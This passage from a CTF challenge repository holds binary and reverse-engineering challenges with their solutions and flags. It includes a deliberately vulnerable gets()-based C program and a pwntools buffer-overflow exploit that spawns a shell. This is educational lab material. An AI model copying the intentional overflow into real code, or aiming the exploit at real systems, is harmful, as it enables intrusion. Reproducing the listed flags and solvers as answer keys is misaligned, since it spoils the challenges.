&ctx1); 71 | } 72 | } 73 | 74 | SWP(28, 25) 75 | } 76 | 77 | int main(int argc, char **argv) { 78 | if (argc != 2) { 79 | fprintf(stderr, "Usage: %s \n", argv[0]); 80 | return 1; 81 | } 82 | 83 | if (strlen(argv[1]) != 32) { 84 | puts("Invalid"); 85 | return 0; 86 | } 87 | 88 | memcpy((void *) inp, argv[1], 32); 89 | 90 | getcontext(&ctx1); 91 | ctx1.uc_stack.ss_sp = stack1; 92 | ctx1.uc_stack.ss_size = sizeof(stack1); 93 | ctx1.uc_link = &ctx2; 94 | makecontext(&ctx1, func1, 0); 95 | 96 | getcontext(&ctx2); 97 | ctx2.uc_stack.ss_sp = stack2; 98 | ctx2.uc_stack.ss_size = sizeof(stack2); 99 | ctx2.uc_link = &ctx_main; 100 | makecontext(&ctx2, func2, 0); 101 | 102 | swapcontext(&ctx_main, &ctx1); 103 | 104 | /*for (int i = 0; i < 32; i++) { 105 | printf("0x%hhx, ", inp[i]); 106 | }*/ 107 | 108 | if (memcmp((void *) inp, expected, 32) == 0) { 109 | puts("Valid"); 110 | } else { 111 | puts("Invalid"); 112 | } 113 | } 114 | -------------------------------------------------------------------------------- /bin/context-clues/sol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from z3 import * 4 | 5 | # Array of 32 bit vectors, one for each character 6 | flag = tuple(BitVec(f'c{i}', 8) for i in range(32)) 7 | # This is the one we actually modify 8 | inp = list(flag) 9 | # Expected result, exported from Ghidra 10 | exp = [0x6a, 0x63, 0x39, 0x30, 0x2e, 0x2b, 0x34, 0x4e, 0x4c, 0x1b, 0x4f, 0x2d, 0x5b, 0xb, 0x79, 0x1c, 0x20, 0x7b, 0xa, 0x6b, 0x4f, 0x20, 0x11, 0x72, 0x70, 0x23, 0x63, 0x77, 0x18, 0x3a, 0x6a, 0x5e] 11 | 12 | # Sanity check to make sure I copied this properly 13 | assert(len(exp) == 32) 14 | 15 | # Helper function to swap 2 elements of inp 16 | def swap(i, j): 17 | inp[i], inp[j] = inp[j], inp[i] 18 | 19 | # Copy of func1; we'll model func2 as a generator and use `next` to pass control to it 20 | def func1(): 21 | g = func2() 22 | for i in range(6, 0x1c): 23 | inp[i] ^= 0x37 24 | if i == 0x10: 
25 | next(g) 26 | swap(5, 24) 27 | for i in range(3, 0x16): 28 | inp[i] ^= inp[i-1] 29 | if i == 7: 30 | next(g) 31 | swap(6, 9) 32 | for i in range(0xd, 0x1e): 33 | swap(i, 12) 34 | if i == 0x15: 35 | next(g) 36 | swap(15, 27) 37 | # In the binary, the context for func1 returns to the context for func2; 38 | # to simulate this, we pass control to func2 one last time 39 | next(g) 40 | 41 | # Copy of func2; we'll use `yield` to pass control back to func1 42 | def func2(): 43 | for i in range(3, 0x1d): 44 | swap(i, 2) 45 | if i == 0xb: 46 | yield 47 | swap(11, 20) 48 | for i in range(0xc, 0x20): 49 | inp[i] ^= inp[i-1] 50 | if i == 0x14: 51 | yield 52 | swap(30, 27) 53 | for i in range(4, 0x12): 54 | inp[i] ^= 0x78 55 | if i == 0xe: 56 | yield 57 | swap(25, 28) 58 | # In the binary, the context for func2 returns directly to the context for main; 59 | # we simulate this by returning control to func1, which then returns to main 60 | yield 61 | 62 | func1() 63 | 64 | # Create the solver and add the constraints 65 | s = Solver() 66 | for a, b in zip(inp, exp): 67 | s.add(a == b) 68 | 69 | # Assert that the solver found a solution 70 | assert(s.check() == sat) 71 | 72 | model = s.model() 73 | 74 | # Get the value the solver assigned to each character and combine them into a byte string 75 | flag = bytes(model[c].as_long() for c in flag) 76 | print(flag) 77 | -------------------------------------------------------------------------------- /bin/going-over/README.md: -------------------------------------------------------------------------------- 1 | # going-over 2 | 3 | ## Challenge Text 4 | * My friends said they were going on a trip but I think they ran into some trouble... nc 0.cloud.chals.io 10197 5 | * They sent me these two files before we lost contact ([src.c](challenge/files/src.c) and [going-over](challenge/going-over)) 6 | 7 | ## Hint 8 | * If only there were a way to find the exact location of the ledge... 
like if the ledge had an address or something 9 | 10 | ## Solution 11 | * Use pwntools to print `cyclic(100)`, which will return a long string we can use to test buffer overflow (line 7 of `solver.py`) 12 | * Use pwntools to run `going-over` (line 3 of `solver.py`) 13 | * The terminal will say the process is running and output a `pid` 14 | * Run `gdb ./going-over -p [pid]` in a separate terminal 15 | * Run the process in gdb and paste the long string from earlier 16 | * The program will segfault and you can examine which part of the string overwrote the return pointer with `x/xw $rsp`; the overwrite is possible because `main` in `src.c` reads the input with `gets` into a 12-byte `action` buffer, and the Dockerfile builds with `-fno-stack-protector -no-pie`, so there is no stack canary and `grab_ledge` sits at a fixed address 17 | * We see that `faaa` overwrote the return pointer 18 | * Run `objdump -d going-over | grep grab_ledge` in a terminal to get the address of the `grab_ledge()` function (on my machine, it is `0x4011b6`) 19 | * Use pwntools to get the proper padding with `cyclic_find("faaa")` 20 | * Connect to the server and port (line 5 of `solver.py`) 21 | * Send the proper padding and the return address (lines 8-11 of `solver.py`) 22 | * A shell is created and then you can do `cat flag.txt` to read the flag file 23 | * Flag: `jctf{ph3w_ju57_1n_71m3}` 24 | 25 | ## Credit 26 | * Developed by Penelope 27 | -------------------------------------------------------------------------------- /bin/going-over/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu@sha256:86ac87f73641c920fb42cc9612d4fb57b5626b56ea2a19b894d0673fd5b4f2e9 AS build 2 | 3 | RUN apt-get update -y && \ 4 | apt-get install -y gcc && \ 5 | rm -rf /var/lib/apt/lists/* 6 | 7 | COPY /files/src.c . 
8 | RUN gcc src.c -o going-over -fno-stack-protector -no-pie 9 | 10 | FROM ubuntu@sha256:86ac87f73641c920fb42cc9612d4fb57b5626b56ea2a19b894d0673fd5b4f2e9 11 | 12 | RUN useradd -m -d /home/jersey -u 12345 jersey 13 | WORKDIR /home/jersey 14 | 15 | RUN mkdir /home/jersey/bin && \ 16 | cp /bin/sh /home/jersey/bin && \ 17 | cp /bin/ls /home/jersey/bin && \ 18 | cp /bin/cat /home/jersey/bin 19 | 20 | COPY ynetd . 21 | RUN chmod +x ynetd 22 | 23 | COPY --from=build going-over going-over 24 | COPY /files/flag.txt /home/jersey/ 25 | 26 | RUN chmod a-w /tmp 27 | 28 | RUN chmod a-w /home/jersey 29 | 30 | RUN chown -R root:root /home/jersey 31 | 32 | USER jersey 33 | EXPOSE 9999 34 | CMD ./ynetd -p 9999 ./going-over 35 | -------------------------------------------------------------------------------- /bin/going-over/challenge/files/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{ph3w_ju57_1n_71m3} -------------------------------------------------------------------------------- /bin/going-over/challenge/files/src.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | /* grab_ledge: prints a message and then replaces the process image with /bin/sh via execve(). Nothing in this file calls it. */ 4 | void grab_ledge() 5 | { 6 | puts("ayy we made it"); 7 | execve("/bin/sh", NULL, NULL); /* argv and envp are both passed as NULL */ 8 | } 9 | /* main: unbuffers the three stdio streams, prints the prompt, reads one line into action and echoes it back. */ 10 | int main(void) 11 | { 12 | char action[12]; /* 12-byte stack buffer filled by gets() below */ 13 | 14 | setvbuf(stdout, NULL, _IONBF, 0); 15 | setvbuf(stdin, NULL, _IONBF, 0); 16 | setvbuf(stderr, NULL, _IONBF, 0); 17 | 18 | puts("We thought it was a good idea to go white-water rafting..."); 19 | puts("but now we're about to go over a waterfall!!"); 20 | puts("HELP!!!!!"); 21 | puts("The map said there was a ledge nearby that we could escape to but I can't find it!!!"); 22 | 23 | gets(action); /* Intentional flaw for the challenge: gets() applies no length limit, so a line longer than 11 characters writes past action. A bounded read such as fgets(action, sizeof action, stdin) would prevent that. */ 24 | printf("Let's try this %s and hope it works D:\n", action); 25 | } -------------------------------------------------------------------------------- /bin/going-over/challenge/going-over: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/going-over/challenge/going-over -------------------------------------------------------------------------------- /bin/going-over/challenge/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # p = process("./realone") 4 | # input("Attach GDB") 5 | p = remote("[server]", [port]) 6 | 7 | # padding = cyclic(100) 8 | padding = b"A" * cyclic_find("faaa") 9 | pointer = p64(0x4011b6) 10 | 11 | p.send(padding + pointer) 12 | 13 | p.interactive() -------------------------------------------------------------------------------- /bin/going-over/challenge/ynetd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/going-over/challenge/ynetd -------------------------------------------------------------------------------- /bin/kangaroo/README.md: -------------------------------------------------------------------------------- 1 | # kangaroo 2 | 3 | ## Challenge Text 4 | * I'm feeling pretty JUMPY today. Can you give me a nice flag to JUMP on? 5 | 6 | ## Hint 7 | * There's a lot of code, but most of it seems pretty similar. Try to look at the bigger picture. 8 | 9 | ## Solution 10 | Reverse engineering challenge obfuscated with the `setjmp` and `longjmp` functions 11 | 12 | The structure of the binary is essentially a long list of blocks initialized with `setjmp`, 13 | followed by a `longjmp` to the one called `start`. 14 | Pretty much all of the variables in this program are global, and have their names exported with the binary. 
15 | Most of the blocks fall into one of two categories: 16 | 17 | * "State" blocks, which set the global `nxstate`, call `permute`, and `longjmp` to a block called `control` 18 | * "Transform" blocks, which apply some transformation to the global buffer `flags`, then `longjmp` to one of the state blocks (determined by `nxstate`) 19 | 20 | There are also a few other special blocks: 21 | 22 | * `start` prints out the initial prompt, then copies `argv[1]` into `flag` and its length into `flag_len`, ensuring that it exists and isn't an empty string, 23 | then finally jumps to the first state block 24 | * `accept` prints a message indicating that the input was accepted, then exits 25 | * `reject` prints a message indicating that the input was rejected, then exits 26 | * `control` increments `flag` and `flag_len` by 1 (effectively cutting off the first character), 27 | then `longjmp`s to one of the transform blocks if the buffer isn't empty, 28 | or to either `accept` or `reject` if it is 29 | 30 | Basically, it's a finite state machine that also transforms the flag as it examines it. 31 | The control flow goes something like this: 32 | 33 | 1. `start` reads in the input and jumps to the first state 34 | 2. Each state checks the first character of the current buffer, then sets `nxstate` based on the current state and character, 35 | based on a global array called `jumps` 36 | 3. Each state also calls `permute` on the global array `transform_inds`, with a parameter from the `perms` array based on the current state 37 | * Each `perm` is a permutation of the numbers 0-7; `permute` applies the same permutation to its first argument 38 | 4. Then, each state `longjmp`s to `control` 39 | 5. `control` first cuts the first character off of the buffer 40 | 6. 
Then, if the buffer isn't empty: 41 | * `control` jumps to a transform block, which is chosen by `transforms[transform_inds[0]]` 42 | * There are 8 transform blocks, each of which either shuffles the bytes around, adds some value to all of the bytes mod 256, 43 | XORs every byte with some value, or some combination of these 44 | * Then, each transform block jumps to the state given by `states[nxstate]`, cycling back to step 2 with the next character 45 | 7. If the buffer is empty, `control` checks `accepts[nxstate]` to see if the next state is an "accept" state; 46 | if it is, it jumps to `accept`, if it isn't, it jumps to `reject` 47 | 48 | There are way too many states for us to reason about this manually. 49 | Luckily, most of the relevant information is stored in a few giant global arrays, so we can just dump those and analyze them in Python. 50 | I used Ghidra's copy bytes option; the result is in the [solution folder](sol). 51 | Now, after looking at the data a little bit, there are a few things that we can see: 52 | 53 | * Not all of the states are reachable from state 0, so we can completely ignore the ones that aren't 54 | * There's only one reachable accept state, which means we *have* to get to that state for our string to be accepted 55 | * There's only one reachable state that can jump to that state, and only one reachable state that can jump to *that* one, 56 | and so on all the way back to state 0; this means that there's exactly one possible route through the program that ends in an accept state 57 | 58 | Now we can recover the flag by doing the following: 59 | 60 | * Figure out the route we need to take for the string to be accepted 61 | * Figure out what transformation is applied at each step (since this is independent of the input) 62 | * This involves running through the route forwards to see how the transformations are permuted at each step 63 | * Run through the route backwards to construct the flag; this involves 2 parts: 64 | 1. 
Undo the transformation applied at this step 65 | 2. Prepend the byte that would send us to the next state in the route 66 | 67 | The [solution folder](sol) includes a commented Python script with more details. 68 | 69 | * Flag: `jctf{h1PpiTy_H0PP1tY_a95c4603}` 70 | 71 | ## Credit 72 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 73 | -------------------------------------------------------------------------------- /bin/kangaroo/challenge/kangaroo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/kangaroo/challenge/kangaroo -------------------------------------------------------------------------------- /bin/kangaroo/kangaroo-gen.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/kangaroo/kangaroo-gen.tar.gz -------------------------------------------------------------------------------- /bin/kangaroo/sol/accepts.txt: -------------------------------------------------------------------------------- 1 | 0000000000000000010001000000000000000000000100000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000010101000000000100000000000100000000000000000000000000 2 | -------------------------------------------------------------------------------- /bin/kangaroo/sol/perms.txt: -------------------------------------------------------------------------------- 1 | 
01060005020307040607020301000405010007050203060407000204050301060305070204010600040200030106070501000602050407030006020703050401030001070504020601060403050702000600030405010207060105020007040300020506040103070702030501060400070005020603040102070100060504030602070001050304020704060500030105030700020106040503000207040106040302070005010601050206000304070205040601070003020307000604010504020003050607010605030207040001050403060102000705010600020704030602010700030504060407010003020503070601050400020700050601020304040500060102030700010706040503020103020605040700060400030705010205070106040002030601020704030005050002060107030401020407050600030206030007040105000401070503020606020001030407050102040706050300050304060102000703040205070001060302000406010705040500060702030106020304050701000003020504070106030001050702060405070301060402000700040501060302030107000506020400010504030702060006010405030207030204070100050604070500010203060701040205060300020307060100040501030604000507020503000104020706040005070301020606040201050703000600020401030705070001030406050205000702060304010107050306000402000406030701020500050401070306020700050102040603060705020301000407000204030601050302010006070504000401060703020500040603050102070705040002010603050401020703060002030706010500040204050706030001020107000504060300030105070602040306070201000405030206000501040705060002030104070206000503040701070006010405030207030004050106020705040100060203000205010403060700070406030105020504060207010300020704050306010006000302040501070100040602070305000702030106040505060402030100070703020104000605020407010006030504000507020301060100070605020403070203050104000603060005070401020207040605010300020506000403070103010700040206050602050300040701050001070302040604060207010003050604050302010700070305020406010005040007020603010602030704000105010007060503020402010503040007060302070105040600000107030204050605000307010602040002060104050307070304020500010601030406050007020701000604030502050204060703010007010305040602000002050107060403
020401000506030700070504030601020504000703020106 2 | -------------------------------------------------------------------------------- /bin/kangaroo/sol/solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from struct import unpack 4 | from binascii import unhexlify 5 | 6 | # Helper function; loads data dumped from Ghidra as "Byte String (no spaces)" 7 | def load_dump(filename): 8 | with open(filename, 'r') as f: 9 | dump = f.read().strip() 10 | return unhexlify(dump) 11 | 12 | # Load the data for the 3 global arrays 13 | jumps_dump = load_dump('jumps.txt') 14 | perms_dump = load_dump('perms.txt') 15 | accepts_dump = load_dump('accepts.txt') 16 | 17 | # Unpack this data into the right type 18 | # Sidenote: tuples are basically just immutable lists in Python, 19 | # so I tend to use them anywhere I have a list I'm not going to modify for the sake of clarity 20 | jumps = unpack(f'<{128*256}I', jumps_dump) 21 | jumps = tuple(jumps[i:i+256] for i in range(0, 128*256, 256)) 22 | 23 | perms = unpack(f'<{128*8}B', perms_dump) 24 | perms = tuple(perms[i:i+8] for i in range(0, 128*8, 8)) 25 | 26 | accepts = tuple(bool(x) for x in accepts_dump) 27 | 28 | # First, we want to figure out which states are actually reachable at all 29 | reachable = set() 30 | # We can also get the (reachable) parents of each state, 31 | # i.e. 
the states that can jump directly to that state 32 | parents = tuple(set() for i in range(128)) 33 | 34 | # We use a recursive function to do a depth-first search on the jumps array 35 | def add_reachable(ind): 36 | global jumps, reachable, parents 37 | reachable.add(ind) 38 | for i in jumps[ind]: 39 | parents[i].add(ind) 40 | if i not in reachable: 41 | add_reachable(i) 42 | 43 | # Initial state is always 0 so we start there 44 | add_reachable(0) 45 | 46 | # Get a set of all of the reachable accept states 47 | final = {i for i in reachable if accepts[i]} 48 | # You can verify by printing the above set that this assertion is true; 49 | # that is, we only have one reachable accept state 50 | # That means that this *must* be the state we end in 51 | assert(len(final) == 1) 52 | final = next(iter(final)) 53 | 54 | # We can verify by examining the jump table that the final state has exactly one parent, 55 | # and all of its ancestors also have exactly one parent, going all the way back to state 0 56 | # This means that there is exactly one "route" through the states that results in our input being accepted 57 | route = [final] 58 | # State 0 is the first state, so we keep prepending to the route until we get to 0 59 | while route[0]: 60 | assert(len(parents[route[0]]) == 1) 61 | route.insert(0, next(iter(parents[route[0]]))) 62 | route = tuple(route) 63 | 64 | # Helper function to cycle a list backwards; returns a copy of the list 65 | def invcycle(buff): 66 | buff = buff[::-1] 67 | for i in range(1, len(buff)): 68 | tmp = buff[0] 69 | buff[0] = buff[i] 70 | buff[i] = tmp 71 | buff = buff[::-1] 72 | return buff 73 | 74 | # Now we create inverses of all the transformations; 75 | # we'll use these to run through the route backwards and reconstruct the flag 76 | def invtrans0(buff): 77 | for _ in range(5): 78 | buff[:] = invcycle(buff) 79 | 80 | def invtrans1(buff): 81 | for i in range(0, len(buff), 4): 82 | buff[i:i+4] = invcycle(buff[i:i+4]) 83 | 84 | def 
invtrans2(buff): 85 | for i in range(len(buff)): 86 | buff[i] = (buff[i] + 256 - 0x5D) & 0xFF 87 | 88 | def invtrans3(buff): 89 | for i in range(len(buff)): 90 | buff[i] ^= 0x1c 91 | 92 | def invtrans4(buff): 93 | for i in range(len(buff)): 94 | buff[i] = (buff[i] + 256 - 0x65) & 0xFF 95 | for _ in range(4): 96 | buff[:] = invcycle(buff) 97 | 98 | def invtrans5(buff): 99 | for i in range(len(buff)): 100 | buff[i] = (buff[i] + 256 - 0xAD) & 0xFF 101 | for i in range(0, len(buff), 3): 102 | buff[i:i+3] = invcycle(buff[i:i+3]) 103 | 104 | def invtrans6(buff): 105 | for i in range(len(buff)): 106 | buff[i] = (buff[i] + 256 - 0x18) & 0xFF 107 | for i in range(len(buff)): 108 | buff[i] ^= 0x65 109 | 110 | def invtrans7(buff): 111 | for i in range(len(buff)): 112 | buff[i] = (buff[i] + 256 - 0xBE) & 0xFF 113 | for _ in range(3): 114 | buff[:] = invcycle(buff) 115 | 116 | # In order to get the transform applied at each state, 117 | # we'll run through the route forwards and apply each permutation to this list 118 | curr_transforms = [invtrans0, invtrans1, invtrans2, invtrans3, invtrans4, invtrans5, invtrans6, invtrans7] 119 | 120 | # Helper function that does exactly the same thing as the version from the binary, 121 | # except that perm isn't reset at the end because we make a copy of it pretty trivially anyway, 122 | # and it works for lengths other than 8 123 | def permute(arr, perm): 124 | assert(len(arr) == len(perm)) 125 | assert(set(perm) == set(range(len(perm)))) 126 | for i in range(len(arr)): 127 | j = i 128 | while perm[j] >= 0: 129 | swp = arr[i] 130 | arr[i] = arr[perm[j]] 131 | arr[perm[j]] = swp 132 | 133 | tmp = perm[j] 134 | perm[j] -= len(perm) 135 | j = tmp 136 | 137 | # This holds the transformations applied to the remainder of the flag after each step 138 | # (Technically it holds the inverse of each transform) 139 | transforms = [] 140 | # We don't need the last 2 states' transformations because those are never applied 141 | for state in route[:-2]: 
142 | # The binary applies the permutation, then applies the first transformation to the flag buffer; 143 | # we'll just save the first transformation to our list 144 | permute(curr_transforms, list(perms[state])) 145 | transforms.append(curr_transforms[0]) 146 | transforms = tuple(transforms) 147 | 148 | # Now, we can reconstruct the flag by essentially simulating the route backwards 149 | flag = [] 150 | for i in range(len(route)-2, -1, -1): 151 | # If the flag isn't empty, we apply the inverse of this state's transform to it 152 | if len(flag): 153 | transforms[i](flag) 154 | # Then, we figure out which jump would have to be taken to get to the next state in the route, 155 | # and prepend the byte that would make it take that jump 156 | flag.insert(0, jumps[route[i]].index(route[i+1])) 157 | flag = bytes(flag) 158 | print(flag) 159 | -------------------------------------------------------------------------------- /bin/misdirection/README.md: -------------------------------------------------------------------------------- 1 | # misdirection 2 | 3 | ## Challenge Text 4 | * Where'd the flag go? 5 | 6 | ## Hint 7 | * There are many ways to solve this challenge, some of which are much easier than others. 8 | 9 | ## Solution 10 | Simple challenge about file descriptors 11 | 12 | This binary XORs 2 arrays together and uses `write` to write the result to file descriptor 5. 13 | This result is (presumably) the flag. 14 | 15 | A file descriptor is basically just an integer that identifies an open file within a process. 16 | By default, file descriptor 0 is `stdin`, 1 is `stdout`, and 2 is `stderr`. 17 | 18 | File descriptor 5 isn't open by default, and the program never opens it, so this will result in an error if the program is run normally 19 | (the binary never actually checks if the call succeeded, so we don't see this error). 20 | 21 | There are a few ways we can get the flag. 
22 | We can use `./misdirection 5>&1`; this uses Bash syntax to redirect FD 5 to FD 1, 23 | which is standard output, so the output gets printed to our terminal. 24 | 25 | We can also use `ltrace -s 9999 ./misdirection`, or `strace -s 9999 ./misdirection`. 26 | `ltrace` and `strace` are commands that print out every library call and system call a program makes respectively. 27 | This way, we can see the call to `write` when it happens, even if it doesn't succeed. 28 | By default, these commands only print the first 32 characters of a string; 29 | `-s 9999` increases this limit to 9999. 30 | 31 | There are a few other ways to solve this challenge: we could use a debugger, set a breakpoint, and get the flag from memory, 32 | or we could copy the arrays from the binary and XOR them ourselves, but that's way more work. 33 | 34 | * Flag: `jctf{l00k5_1iK3_u_f0Und_m3_018a09d6}` 35 | 36 | ## Credit 37 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 
38 | -------------------------------------------------------------------------------- /bin/misdirection/challenge/misdirection: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/misdirection/challenge/misdirection -------------------------------------------------------------------------------- /bin/patches/README.md: -------------------------------------------------------------------------------- 1 | # patches 2 | 3 | ## Challenge Text 4 | * Given an objdump of an executable, figure out what hexadecimal instructions are needed to nop to get the jctf flag to stdout 5 | 6 | ## Hint 7 | * The [Intel Manual](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf) might be overkill, but maybe reviewing Intel Assembly and their corresponding opcodes might help to crack the challenge. **Simply enter the opcodes** 8 | 9 | ## Solution 10 | * Follow the control flow to determine which opcode you have to nop: in `dump.txt`, the `jle 11b9` at `11ad` (bytes `7e 0a`) jumps over the `call 1149` at `11b4`, and the function at `1149` is the one that loads the string at `2008` (`jctf{NIL}`), so those two bytes are what has to be replaced with nops for that call to run 11 | * Flag: `jctf{7e0a}` 12 | 13 | ## Credit 14 | * Developed by [Andres](https://github.com/AOrps) 15 | -------------------------------------------------------------------------------- /bin/patches/challenge/Makefile: -------------------------------------------------------------------------------- 1 | SHELL=/bin/bash 2 | 3 | all = compile 4 | 5 | compile: 6 | @gcc -o patches patches.c 7 | 8 | dump: compile 9 | @touch dump.txt 10 | # Get the .rodata section from Executable 11 | @objdump -s -j .rodata patches >> dump.txt 12 | @printf "\n" >> dump.txt 13 | # Get Intel Assembly Syntax on the main function 14 | @objdump -M intel -d patches | awk -v RS= '/^[[:xdigit:]]+

/' >> dump.txt 15 | @printf "\n" >> dump.txt 16 | @objdump -M intel -d patches | awk -v RS= '/^[[:xdigit:]]+ /' >> dump.txt 17 | @printf "\n" >> dump.txt 18 | @objdump -M intel -d patches | awk -v RS= '/^[[:xdigit:]]+ /' >> dump.txt 19 | # Show output 20 | @cat dump.txt 21 | 22 | clean: 23 | ifneq (,$(wildcard ./a.out)) 24 | @rm ./a.out 25 | endif 26 | ifneq (,$(wildcard ./patches)) 27 | @rm ./patches 28 | endif 29 | ifneq (,$(wildcard ./dump.txt)) 30 | @rm dump.txt 31 | endif -------------------------------------------------------------------------------- /bin/patches/challenge/dump.txt: -------------------------------------------------------------------------------- 1 | 2 | patches: file format elf64-x86-64 3 | 4 | Contents of section .rodata: 5 | 2000 01000200 00000000 6a637466 7b4e494c ........jctf{NIL 6 | 2010 7d006e69 6c206275 73746572 00706174 }.nil buster.pat 7 | 2020 63686573 2d6f686f 756c6968 616e0000 ches-ohoulihan.. 8 | 2030 69662d79 6f752d63 616e2d64 6f646765 if-you-can-dodge 9 | 2040 2d612d77 72656e63 682d796f 752d6361 -a-wrench-you-ca 10 | 2050 6e2d646f 6467652d 612d6261 6c6c00 n-dodge-a-ball. 11 | 12 | 0000000000001177
: 13 | 1177: f3 0f 1e fa endbr64 14 | 117b: 55 push rbp 15 | 117c: 48 89 e5 mov rbp,rsp 16 | 117f: 48 83 ec 30 sub rsp,0x30 17 | 1183: 89 7d dc mov DWORD PTR [rbp-0x24],edi 18 | 1186: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi 19 | 118a: 48 8d 05 8c 0e 00 00 lea rax,[rip+0xe8c] # 201d <_IO_stdin_used+0x1d> 20 | 1191: 48 89 45 f0 mov QWORD PTR [rbp-0x10],rax 21 | 1195: 48 8d 05 94 0e 00 00 lea rax,[rip+0xe94] # 2030 <_IO_stdin_used+0x30> 22 | 119c: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax 23 | 11a0: c7 45 ec 00 00 00 00 mov DWORD PTR [rbp-0x14],0x0 24 | 11a7: eb 1e jmp 11c7 25 | 11a9: 83 7d ec 1d cmp DWORD PTR [rbp-0x14],0x1d 26 | 11ad: 7e 0a jle 11b9 27 | 11af: b8 00 00 00 00 mov eax,0x0 28 | 11b4: e8 90 ff ff ff call 1149 29 | 11b9: b8 00 00 00 00 mov eax,0x0 30 | 11be: e8 9d ff ff ff call 1160 31 | 11c3: 83 45 ec 01 add DWORD PTR [rbp-0x14],0x1 32 | 11c7: 83 7d ec 16 cmp DWORD PTR [rbp-0x14],0x16 33 | 11cb: 7e dc jle 11a9 34 | 11cd: b8 00 00 00 00 mov eax,0x0 35 | 11d2: c9 leave 36 | 11d3: c3 ret 37 | 11d4: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0] 38 | 11db: 00 00 00 39 | 11de: 66 90 xchg ax,ax 40 | 41 | 0000000000001149 : 42 | 1149: f3 0f 1e fa endbr64 43 | 114d: 55 push rbp 44 | 114e: 48 89 e5 mov rbp,rsp 45 | 1151: 48 8d 3d b0 0e 00 00 lea rdi,[rip+0xeb0] # 2008 <_IO_stdin_used+0x8> 46 | 1158: e8 f3 fe ff ff call 1050 47 | 115d: 90 nop 48 | 115e: 5d pop rbp 49 | 115f: c3 ret 50 | 51 | 0000000000001160 : 52 | 1160: f3 0f 1e fa endbr64 53 | 1164: 55 push rbp 54 | 1165: 48 89 e5 mov rbp,rsp 55 | 1168: 48 8d 3d a3 0e 00 00 lea rdi,[rip+0xea3] # 2012 <_IO_stdin_used+0x12> 56 | 116f: e8 dc fe ff ff call 1050 57 | 1174: 90 nop 58 | 1175: 5d pop rbp 59 | 1176: c3 ret 60 | -------------------------------------------------------------------------------- /bin/patches/challenge/patches: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/patches/challenge/patches -------------------------------------------------------------------------------- /bin/patches/challenge/patches.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | void a() { 5 | puts("jctf{NIL}"); 6 | } 7 | 8 | void b() { 9 | puts("nil buster"); 10 | } 11 | 12 | int main(int argc, char* argv[]) { 13 | 14 | int i; 15 | 16 | char* flag = "patches-ohoulihan"; 17 | char* what = "if-you-can-dodge-a-wrench-you-can-dodge-a-ball"; 18 | 19 | for(i = 0; i < 23; i++){ 20 | if( i >= 30) { 21 | a(); 22 | } 23 | b(); 24 | 25 | } 26 | 27 | return 0; 28 | } -------------------------------------------------------------------------------- /bin/symbolism/challenge/symbolism.vbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/symbolism/challenge/symbolism.vbin -------------------------------------------------------------------------------- /bin/symbolism/symbolism.lisp: -------------------------------------------------------------------------------- 1 | (defun char-map (c) 2 | (case c 3 | (#\Space 941) 4 | (#\! 18) 5 | (#\" 583) 6 | (#\# 2035) 7 | (#\$ 52) 8 | (#\% 913) 9 | (#\& 1126) 10 | (#\' 2920) 11 | (#\( 2288) 12 | (#\) 1954) 13 | (#\* 3412) 14 | (#\+ 1665) 15 | (#\, 1597) 16 | (#\- 3662) 17 | (#\. 3701) 18 | (#\/ 3601) 19 | (#\0 2123) 20 | (#\1 3828) 21 | (#\2 167) 22 | (#\3 2421) 23 | (#\4 2544) 24 | (#\5 504) 25 | (#\6 1589) 26 | (#\7 1887) 27 | (#\8 192) 28 | (#\9 3928) 29 | (#\: 1111) 30 | (#\; 243) 31 | (#\< 1101) 32 | (#\= 3131) 33 | (#\> 112) 34 | (#\? 
